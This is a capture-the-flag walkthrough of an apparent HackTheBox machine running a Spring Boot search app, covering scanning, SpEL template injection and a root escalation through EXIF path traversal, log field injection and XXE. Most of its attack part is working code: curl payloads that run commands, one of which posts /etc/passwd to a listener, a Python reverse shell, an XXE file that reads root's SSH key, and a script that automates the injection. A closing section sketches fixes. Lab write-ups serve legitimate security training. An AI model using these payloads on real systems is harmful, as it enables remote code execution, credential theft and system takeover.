Scanning

TARGET=10.10.11.170 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT     STATE SERVICE    REASON         VERSION
22/tcp   open  ssh        syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy syn-ack ttl 63
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Sun, 17 Jul 2022 21:29:22 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en" dir="ltr">
|     <head>
|     <meta charset="utf-8">
|     <meta author="wooden_k">
|     <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
|     <link rel="stylesheet" href="css/panda.css" type="text/css">
|     <link rel="stylesheet" href="css/main.css" type="text/css">
|     <title>Red Panda Search | Made with Spring Boot</title>
|     </head>
|     <body>
|     <div class='pande'>
|     <div class='ear left'></div>
|     <div class='ear right'></div>
|     <div class='whiskers left'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='whiskers right'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='face'>
|     <div class='eye
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Sun, 17 Jul 2022 21:29:22 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Sun, 17 Jul 2022 21:29:22 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
|_http-title: Red Panda Search | Made with Spring Boot
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-open-proxy: Proxy might be redirecting requests

web enum

> dirsearch -u http://10.10.11.170:8080/ -x 401,403           
[17:32:16] 200 -    2KB - /;json/
[17:32:16] 200 -    2KB - /;login/
[17:32:16] 200 -    2KB - /;admin/
[17:32:16] 400 -  435B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[17:32:17] 400 -  435B  - /a%5c.aspx
[17:32:46] 500 -   86B  - /error
[17:32:46] 500 -   86B  - /error/
[17:33:16] 405 -  117B  - /search
[17:33:21] 200 -  987B  - /stats/
[17:33:21] 200 -  987B  - /stats
  • /search answers a GET with 405, so it expects a POST (the search form on the index page); /stats is an extra page worth visiting
> nikto -host http://10.10.11.170:8080/
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'content-disposition' found, with contents: inline;filename=f.txt
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-3092: /stats/: This might be interesting...
  • The site advertises Spring Boot, so the search term posted as name to /search may be rendered through a template that evaluates SpEL. Test the expression syntaxes with a 7*7 canary and see which one comes back as 49 instead of being reflected verbatim:
#{7*7}
*{7*7}

  • The *{...} form is evaluated, and SpEL's T() operator gives access to java.lang.Runtime, i.e. command execution on the target. Runtime.exec(String) only splits the string on whitespace (no shell, so no pipes or redirects); stage a binary and exfiltrate /etc/passwd to a listener:
> curl http://10.10.11.170:8080/search -d 'name=*{T(java.lang.Runtime).getRuntime().exec("wget http://<ip>/nc -O /tmp/nc")}'
> curl http://10.10.11.170:8080/search -d 'name=*{T(java.lang.Runtime).getRuntime().exec("curl http://<ip>/ -d @/etc/passwd")}'
  • From the exfiltrated /etc/passwd we learn there is a user called woodenk
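An added helper (not part of the original notes) that automates the two steps above: it probes which of the three expression syntaxes the search form evaluates, using the same 7*7 canary, and builds the same T(java.lang.Runtime) SpEL primitive the curl lines use. The target URL is the one from the scan; the "49 came back, 7*7 did not" test for a successful evaluation is a heuristic assumption about how the page reflects the search term.

```python
import urllib.parse
import urllib.request

TARGET = "http://10.10.11.170:8080/search"  # /search endpoint from the writeup

# The three expression syntaxes a Spring template page may evaluate.
SYNTAXES = {"variable": "${%s}", "selection": "*{%s}", "message": "#{%s}"}


def build_payload(syntax, expression):
    """Wrap an expression in one of the template syntaxes, e.g. *{7*7}."""
    return SYNTAXES[syntax] % expression


def spel_exec_expression(command):
    """SpEL that runs a command via java.lang.Runtime. Runtime.exec(String)
    splits on whitespace only, so pass a plain argv-style command (no shell)."""
    return 'T(java.lang.Runtime).getRuntime().exec("%s")' % command


def evaluated(body, canary_result="49", canary_source="7*7"):
    """Heuristic (assumed): the canary was evaluated if its result appears in
    the response and the raw canary text is not simply reflected back."""
    return canary_result in body and canary_source not in body


def post_search(name):
    """POST name=<payload> as form data. urlencode handles spaces and '&' in the
    payload, which a raw curl -d body would pass through unencoded."""
    data = urllib.parse.urlencode({"name": name}).encode()
    req = urllib.request.Request(TARGET, data=data)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def probe_syntaxes():
    """Return {syntax: True/False/'error: ...'} for each expression syntax."""
    results = {}
    for name in SYNTAXES:
        try:
            results[name] = evaluated(post_search(build_payload(name, "7*7")))
        except Exception as exc:  # connection refused, 5xx from a banned syntax, ...
            results[name] = "error: %s" % exc
    return results


if __name__ == "__main__":
    print(probe_syntaxes())
    # Once a syntax evaluates (here the selection form *{...}), run a command:
    print(post_search(build_payload("selection", spel_exec_expression("id"))))
```

Only the payload builders and the evaluation check are pure; probe_syntaxes() needs the target reachable. Keep the canary cheap (7*7) so a syntax that errors out tells you it was parsed at all, which is itself a signal.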

foothold

  • Create a python script e.py with the following (replace <ip> with the listener address and have a listener ready on port 4444)
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ip>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
  • Upload the script and run it to get shell access
> curl http://10.10.11.170:8080/search -d 'name=*{T(java.lang.Runtime).getRuntime().exec("wget http://<ip>/e.py -O /tmp/e.py")}'
> curl http://10.10.11.170:8080/search -d 'name=*{T(java.lang.Runtime).getRuntime().exec("python3 /tmp/e.py")}'

pe

  • linpeas enum
[+] Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root logs 422 Jul 18 01:48 /credits/damian_creds.xml
-rw-r----- 1 root logs 426 Jul 18 01:58 /credits/woodenk_creds.xml
-rw-r----- 1 root woodenk 33 Jul 17 22:03 /home/woodenk/user.txt
  • The credits files are owned by root with group logs, which our user belongs to (that is why linpeas lists them as readable by us). Also examine /opt/cleanup.sh, which periodically deletes .xml and .jpg files from the temp directories and from woodenk's home:
> cat /opt/cleanup.sh
#!/bin/bash
/usr/bin/find /tmp -name "*.xml" -exec rm -rf {} \;
/usr/bin/find /var/tmp -name "*.xml" -exec rm -rf {} \;
/usr/bin/find /dev/shm -name "*.xml" -exec rm -rf {} \;
/usr/bin/find /home/woodenk -name "*.xml" -exec rm -rf {} \;
/usr/bin/find /tmp -name "*.jpg" -exec rm -rf {} \;
/usr/bin/find /var/tmp -name "*.jpg" -exec rm -rf {} \;
/usr/bin/find /dev/shm -name "*.jpg" -exec rm -rf {} \;
/usr/bin/find /home/woodenk -name "*.jpg" -exec rm -rf {} \;
  • Read the log parser source and the web app's request log to understand how jpg and xml files are processed (here both fetched from the target over port 8877)
> http://10.10.11.170:8877/opt/credit-score/LogParser/final/src/main/java/com/logparser/App.java
> http://10.10.11.170:8877/opt/panda_search/redpanda.log
  • For each log line whose uri points at a .jpg, the parser opens that image under the app's static directory and reads its Artist EXIF tag, then uses the artist name to build the path of the credits file: /credits/<artist>_creds.xml
  • It parses that XML file and compares each <uri> element with the uri taken from the log line
  • If they match, it updates the view counts and writes the whole XML document back to disk
  • The XML is parsed with external entities enabled, so an entity such as <!ENTITY example SYSTEM "file:///root/.ssh/id_rsa"> is expanded and its contents end up in the rewritten file. This is the classic XXE trick: https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
  • Neither the Artist tag nor the uri is checked for ../, and the parser runs as root, so we can point it at an XML file we control and have it copy root's id_rsa into that file
  • Prepare two files locally: any jpg whose Artist tag makes /credits/<artist>_creds.xml resolve to /home/woodenk/meow_creds.xml, and the XML below (saved as meow.xml) carrying the external entity and a <uri> that reaches our jpg from the static directory via ../
> exiftool -Artist='../home/woodenk/meow' meow.jpg
> cat meow.xml

<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///root/.ssh/id_rsa"> ]>
<credits>
  <author>damian</author>
  <image>
    <data>&example;</data>
    <uri>/../../../../../../home/woodenk/meow.jpg</uri>
    <views>0</views>
  </image>
  <totalviews>2</totalviews>
</credits>
  • Upload the two files to the target, from the foothold shell, into /home/woodenk
> wget http://<ip>/meow.jpg -O meow.jpg
> wget http://<ip>/meow.xml -O meow_creds.xml
  • Trigger the log parser with a crafted User-Agent. The log line stores its fields separated by ||, with the User-Agent just before the uri, so a User-Agent that starts with || pushes our traversal path into the uri field and the parser opens our jpg instead of looking at the /stats request:
> curl http://10.10.11.170:8080/stats -A "||/../../../../../../home/woodenk/meow.jpg"
> cat /opt/panda_search/redpanda.log
  • Confirm the injected line is in the log, then wait for the parser to run. cleanup.sh removes .xml and .jpg files from /home/woodenk, so if the two files vanish before the parser has processed them, upload them again and re-send the request. Once meow_creds.xml has been rewritten, its <data> element contains root's id_rsa
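To make the chain concrete, here is an added Python model of the parser logic described above (constructed for illustration; it is not the project's Java code). It assumes the log format status||ip||user_agent||uri, inferred from the User-Agent payload used in the notes, and an assumed static directory path. It shows how a || in the User-Agent moves our path into the uri field, how the Artist tag and the uri traverse out of /credits and the static directory, and the two checks that would stop both.

```python
import posixpath
import re

# Assumed paths, used only to show how the traversal resolves.
STATIC_ROOT = "/opt/panda_search/src/main/resources/static"
CREDITS_DIR = "/credits"


def make_log_line(status, ip, user_agent, uri):
    """Assumed log format: four fields joined with '||', UA written verbatim."""
    return "%s||%s||%s||%s" % (status, ip, user_agent, uri)


def parse_log(line):
    """Naive split as the parser is described to do: a '||' inside the
    User-Agent shifts the fields, so index 3 (uri) comes from attacker data."""
    f = line.split("||")
    return {"status_code": int(f[0]), "ip": f[1], "user_agent": f[2], "uri": f[3]}


def image_path(uri):
    """Where the jpg is opened: static root + uri, with no containment check."""
    return posixpath.normpath(STATIC_ROOT + uri)


def creds_path(artist):
    """Credits file derived from the EXIF Artist tag: /credits/<artist>_creds.xml."""
    return posixpath.normpath(posixpath.join(CREDITS_DIR, artist + "_creds.xml"))


def attack_chain(user_agent, artist):
    """Resolve what a request to /stats with this User-Agent, plus a jpg
    carrying this Artist tag, makes the parser open (jpg) and rewrite (xml).
    Returns None when the log line would be skipped (no .jpg in it)."""
    line = make_log_line(200, "10.10.14.5", user_agent, "/stats")  # constructed line
    if ".jpg" not in line:
        return None
    rec = parse_log(line)
    return {"uri": rec["uri"], "jpg": image_path(rec["uri"]), "xml": creds_path(artist)}


# Hardened counterparts: reject field injection and confine every path.
def parse_log_safe(line):
    """Return None unless the line has exactly four fields."""
    f = line.split("||")
    if len(f) != 4 or not f[0].isdigit():
        return None
    return {"status_code": int(f[0]), "ip": f[1], "user_agent": f[2], "uri": f[3]}


def within(base, path):
    real = posixpath.normpath(path)
    return real == base or real.startswith(base.rstrip("/") + "/")


def image_path_safe(uri):
    """Join under the static root and refuse anything that normalises outside it."""
    p = posixpath.normpath(posixpath.join(STATIC_ROOT, uri.lstrip("/")))
    return p if within(STATIC_ROOT, p) else None


def creds_path_safe(artist):
    """Only allow artist names that cannot contain path separators or dots."""
    if not re.fullmatch(r"[A-Za-z0-9_-]+", artist):
        return None
    return posixpath.join(CREDITS_DIR, artist + "_creds.xml")


if __name__ == "__main__":
    ua = "||/../../../../../../home/woodenk/meow.jpg"
    print(attack_chain(ua, "../home/woodenk/meow"))
    print(parse_log_safe(make_log_line(200, "10.10.14.5", ua, "/stats")))
```

The two traversals are independent bugs: the Artist tag decides which XML gets rewritten, the uri decides which jpg is read, and the || injection is only needed because the real request path (/stats) would otherwise be what ends up in the uri field. Fixing only the log writer (escaping || in the User-Agent) leaves the EXIF traversal and the XXE in place.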